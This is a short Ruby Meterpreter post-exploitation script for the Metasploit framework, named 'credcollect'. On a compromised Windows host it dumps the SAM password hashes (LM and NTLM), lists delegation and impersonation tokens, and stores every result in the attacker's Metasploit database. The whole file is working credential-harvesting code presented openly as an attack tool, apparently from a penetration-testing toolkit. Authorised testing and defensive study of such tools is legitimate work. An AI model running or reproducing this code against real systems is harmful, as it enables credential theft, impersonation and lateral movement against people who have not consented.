# $Id$ # credcollect - tebo[at]attackresearch.com opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help menu." ] ) opts.parse(args) { |opt, idx, val| case opt when "-h" print_line("CredCollect -- harvest credentials found on the host and store them in the database") print_line("USAGE: run credcollect") print_line(opts.usage) raise Rex::Script::Completed end } # No sense trying to grab creds if we don't have any place to put them if !client.framework.db.active raise RuntimeError, "Database not connected. Run db_connect first." end # Make sure we're rockin Priv and Incognito client.core.use("priv") if not client.respond_to?("priv") client.core.use("incognito") if not client.respond_to?("incognito") # It wasn't me mom! Stinko did it! hashes = client.priv.sam_hashes # Target infos for the db record addr = client.sock.peerhost client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive) # Record hashes to the running db instance hashes.each do |hash| data = {} data[:host] = addr data[:proto] = 'smb' data[:user] = hash.user_name data[:hash] = hash.lanman + ":" + hash.ntlm data[:target_host] = addr data[:hash_string] = hash.hash_string client.framework.db.report_auth_info(data) end # Record user tokens tokens = client.incognito.incognito_list_tokens(0) raise Rex::Script::Completed if not tokens # Meh, tokens come to us as a formatted string (tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token| data = {} data[:host] = addr data[:proto] = 'smb' data[:token] = token data[:target_host] = addr client.framework.db.report_auth_info(data) end